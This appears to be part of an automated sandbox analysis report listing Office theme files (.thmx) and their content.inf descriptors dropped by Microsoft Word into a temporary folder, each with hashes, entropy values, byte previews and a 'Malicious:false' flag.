                                                                                                                                              Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6FAF.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):276
                                                                                                                                              Entropy (8bit):3.5364757859412563
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                                              MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                                              SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                                                                              SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                                              SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6FC0.tmp\Circuit.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1463634
                                                                                                                                              Entropy (8bit):7.898382456989258
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                              MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                              SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                              SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                              SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6FC0.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):280
                                                                                                                                              Entropy (8bit):3.5286004619027067
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                                              MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                                              SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                                                                              SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                                              SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7158.tmp\Droplet.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1750795
                                                                                                                                              Entropy (8bit):7.892395931401988
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                              MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                              SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                              SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                              SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7158.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):280
                                                                                                                                              Entropy (8bit):3.528155916440219
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                                              MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                                              SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                                              SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                                              SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7458.tmp\Damask.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2218943
                                                                                                                                              Entropy (8bit):7.942378408801199
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                              MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                              SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                              SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                              SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7458.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):278
                                                                                                                                              Entropy (8bit):3.544065206514744
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                                              MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                                              SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                                              SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                                                                              SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7479.tmp\Slate.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2357051
                                                                                                                                              Entropy (8bit):7.929430745829162
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                              MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                              SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                              SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                              SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7479.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):276
                                                                                                                                              Entropy (8bit):3.516423078177173
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                                              MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                                              SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                                              SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                                              SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7844.tmp\Main_Event.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2924237
                                                                                                                                              Entropy (8bit):7.970803022812704
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                              MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                              SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                              SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                              SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7844.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):286
                                                                                                                                              Entropy (8bit):3.5434534344080606
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                                              MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                                              SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                                              SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                                              SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7865.tmp\Mesh.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3078052
                                                                                                                                              Entropy (8bit):7.954129852655753
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                              MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                              SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                              SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                              SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7865.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):274
                                                                                                                                              Entropy (8bit):3.5303110391598502
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                                              MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                                              SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                                              SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                                              SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7CEB.tmp\Vapor_Trail.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3611324
                                                                                                                                              Entropy (8bit):7.965784120725206
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                              MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                              SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                              SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                              SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7CEB.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):288
                                                                                                                                              Entropy (8bit):3.5359188337181853
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                                              MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                                              SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                                              SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                                              SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                                              Malicious:false
